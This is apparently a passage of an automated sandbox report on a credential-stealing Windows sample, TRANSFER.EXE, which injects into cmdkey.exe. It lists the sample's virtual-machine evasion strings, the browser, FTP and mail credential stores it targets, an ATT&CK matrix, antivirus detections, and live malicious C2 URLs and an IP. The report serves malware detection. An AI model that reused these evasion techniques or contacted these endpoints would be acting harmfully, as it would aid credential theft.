                Source: C:\Users\user\Desktop\TRANSFER.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\TRANSFER.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\TRANSFER.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\TRANSFER.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\TRANSFER.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\TRANSFER.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: 00000000.00000002.410543531.0000000004510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: TRANSFER.EXE PID: 5732, type: MEMORYSTR
                Source: TRANSFER.EXE, 00000000.00000002.410543531.0000000004510000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                Source: TRANSFER.EXE, 00000000.00000002.406221429.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp, TRANSFER.EXE, 00000000.00000002.410543531.0000000004510000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                Source: C:\Users\user\Desktop\TRANSFER.EXE TID: 6080Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\cmdkey.exe TID: 1600Thread sleep time: -180000s >= -30000s
                Source: C:\Users\user\Desktop\TRANSFER.EXEThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\TRANSFER.EXEProcess information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
                Source: C:\Users\user\Desktop\TRANSFER.EXEThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\cmdkey.exeThread delayed: delay time: 60000
                Source: TRANSFER.EXE, 00000000.00000002.410543531.0000000004510000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                Source: TRANSFER.EXE, 00000000.00000002.410543531.0000000004510000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\EnumNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                Source: TRANSFER.EXE, 00000000.00000002.410543531.0000000004510000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WWW /c Microsoft-Hyper-V-Common-Drivers-Package
                Source: TRANSFER.EXE, 00000000.00000002.410543531.0000000004510000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
                Source: TRANSFER.EXE, 00000000.00000002.410543531.0000000004510000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                Source: TRANSFER.EXE, 00000000.00000002.410543531.0000000004510000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                Source: TRANSFER.EXE, 00000000.00000002.410543531.0000000004510000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
                Source: TRANSFER.EXE, 00000000.00000002.410543531.0000000004510000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                Source: TRANSFER.EXE, 00000000.00000002.410543531.0000000004510000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
                Source: TRANSFER.EXE, 00000000.00000002.410543531.0000000004510000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
                Source: TRANSFER.EXE, 00000000.00000002.410543531.0000000004510000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
                Source: TRANSFER.EXE, 00000000.00000002.410543531.0000000004510000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
                Source: TRANSFER.EXE, 00000000.00000002.410543531.0000000004510000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 1_2_00402B7C GetProcessHeap,RtlAllocateHeap,
                Source: C:\Users\user\Desktop\TRANSFER.EXEProcess token adjusted: Debug
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess token adjusted: Debug
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 1_2_0040317B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\TRANSFER.EXEMemory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\TRANSFER.EXEMemory written: C:\Windows\SysWOW64\cmdkey.exe base: 400000
                Source: C:\Users\user\Desktop\TRANSFER.EXEMemory written: C:\Windows\SysWOW64\cmdkey.exe base: 401000
                Source: C:\Users\user\Desktop\TRANSFER.EXEMemory written: C:\Windows\SysWOW64\cmdkey.exe base: 415000
                Source: C:\Users\user\Desktop\TRANSFER.EXEMemory written: C:\Windows\SysWOW64\cmdkey.exe base: 41A000
                Source: C:\Users\user\Desktop\TRANSFER.EXEMemory written: C:\Windows\SysWOW64\cmdkey.exe base: 4A0000
                Source: C:\Users\user\Desktop\TRANSFER.EXEMemory written: C:\Windows\SysWOW64\cmdkey.exe base: 4A2000
                Source: C:\Users\user\Desktop\TRANSFER.EXEMemory written: C:\Windows\SysWOW64\cmdkey.exe base: 2D7A008
                Source: C:\Users\user\Desktop\TRANSFER.EXEMemory allocated: C:\Windows\SysWOW64\cmdkey.exe base: 400000 protect: page execute and read and write
                Source: C:\Users\user\Desktop\TRANSFER.EXEMemory written: C:\Windows\SysWOW64\cmdkey.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\TRANSFER.EXEProcess created: C:\Windows\SysWOW64\cmdkey.exe C:\Windows\SysWOW64\cmdkey.exe
                Source: C:\Users\user\Desktop\TRANSFER.EXEQueries volume information: C:\Users\user\Desktop\TRANSFER.EXE VolumeInformation
                Source: C:\Windows\SysWOW64\cmdkey.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 1_2_00406069 GetUserNameW,

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 0.2.TRANSFER.EXE.3b05550.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.cmdkey.exe.400000.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.cmdkey.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.cmdkey.exe.400000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.TRANSFER.EXE.3ae5530.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.cmdkey.exe.400000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.cmdkey.exe.400000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.cmdkey.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.cmdkey.exe.400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.cmdkey.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.cmdkey.exe.400000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.cmdkey.exe.400000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.cmdkey.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.cmdkey.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.cmdkey.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.cmdkey.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.409421719.0000000003B05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.408476159.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.637716959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.409336982.0000000003AE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000000.390107800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000000.389788702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000000.389487311.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000000.390702511.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000000.390434456.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: TRANSFER.EXE PID: 5732, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: cmdkey.exe PID: 5816, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\cmdkey.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Windows\SysWOW64\cmdkey.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                Source: C:\Windows\SysWOW64\cmdkey.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
                Source: C:\Windows\SysWOW64\cmdkey.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
                Source: C:\Windows\SysWOW64\cmdkey.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
                Source: C:\Windows\SysWOW64\cmdkey.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
                Source: C:\Windows\SysWOW64\cmdkey.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
                Source: C:\Windows\SysWOW64\cmdkey.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: PopPassword
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: SmtpPassword
                Source: C:\Windows\SysWOW64\cmdkey.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: Yara matchFile source: 0.2.TRANSFER.EXE.3b05550.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.cmdkey.exe.400000.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.cmdkey.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.cmdkey.exe.400000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.TRANSFER.EXE.3ae5530.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.cmdkey.exe.400000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.cmdkey.exe.400000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.cmdkey.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.cmdkey.exe.400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.cmdkey.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.cmdkey.exe.400000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.cmdkey.exe.400000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.cmdkey.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.cmdkey.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.cmdkey.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.cmdkey.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.409421719.0000000003B05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.408476159.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.637716959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.409336982.0000000003AE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000000.390107800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000000.389788702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000000.389487311.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000000.390702511.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000000.390434456.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsWindows Management InstrumentationPath Interception1
                Access Token Manipulation
                1
                Disable or Modify Tools
                2
                OS Credential Dumping
                1
                Account Discovery
                Remote Services1
                Archive Collected Data
                Exfiltration Over Other Network Medium1
                Ingress Tool Transfer
                Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts311
                Process Injection
                1
                Deobfuscate/Decode Files or Information
                2
                Credentials in Registry
                1
                File and Directory Discovery
                Remote Desktop Protocol2
                Data from Local System
                Exfiltration Over Bluetooth1
                Encrypted Channel
                Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)2
                Obfuscated Files or Information
                Security Account Manager13
                System Information Discovery
                SMB/Windows Admin Shares1
                Email Collection
                Automated Exfiltration2
                Non-Application Layer Protocol
                Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                Software Packing
                NTDS111
                Security Software Discovery
                Distributed Component Object ModelInput CaptureScheduled Transfer112
                Application Layer Protocol
                SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                Masquerading
                LSA Secrets1
                Process Discovery
                SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common21
                Virtualization/Sandbox Evasion
                Cached Domain Credentials21
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                Access Token Manipulation
                DCSync1
                System Owner/User Discovery
                Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job311
                Process Injection
                Proc Filesystem1
                Remote System Discovery
                Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                Hidden Users
                /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                TRANSFER.EXE24%VirustotalBrowse
                TRANSFER.EXE15%ReversingLabsByteCode-MSIL.Backdoor.Androm
                No Antivirus matches
                SourceDetectionScannerLabelLinkDownload
                1.0.cmdkey.exe.400000.3.unpack100%AviraHEUR/AGEN.1219273Download File
                1.0.cmdkey.exe.400000.4.unpack100%AviraHEUR/AGEN.1219273Download File
                1.0.cmdkey.exe.400000.1.unpack100%AviraHEUR/AGEN.1219273Download File
                0.2.TRANSFER.EXE.3ae5530.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                1.0.cmdkey.exe.400000.2.unpack100%AviraHEUR/AGEN.1219273Download File
                0.2.TRANSFER.EXE.3b05550.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                1.0.cmdkey.exe.400000.6.unpack100%AviraHEUR/AGEN.1219273Download File
                1.2.cmdkey.exe.400000.1.unpack100%AviraHEUR/AGEN.1219273Download File
                1.0.cmdkey.exe.400000.0.unpack100%AviraHEUR/AGEN.1219273Download File
                1.0.cmdkey.exe.400000.5.unpack100%AviraHEUR/AGEN.1219273Download File
                SourceDetectionScannerLabelLink
                sempersim.su27%VirustotalBrowse
                SourceDetectionScannerLabelLink
                http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
                http://alphastand.win/alien/fre.php0%URL Reputationsafe
                http://alphastand.trade/alien/fre.php0%URL Reputationsafe
                http://alphastand.top/alien/fre.php0%URL Reputationsafe
                http://www.ibsensoftware.com/0%URL Reputationsafe
                http://sempersim.su/gi4/fre.php24%VirustotalBrowse
                http://sempersim.su/gi4/fre.php100%Avira URL Cloudmalware
                NameIPActiveMaliciousAntivirus DetectionReputation
                sempersim.su
                45.11.26.144
                truetrueunknown
                NameMaliciousAntivirus DetectionReputation
                http://kbfvzoboss.bid/alien/fre.phptrue
                • URL Reputation: safe
                unknown
                http://alphastand.win/alien/fre.phptrue
                • URL Reputation: safe
                unknown
                http://alphastand.trade/alien/fre.phptrue
                • URL Reputation: safe
                unknown
                http://alphastand.top/alien/fre.phptrue
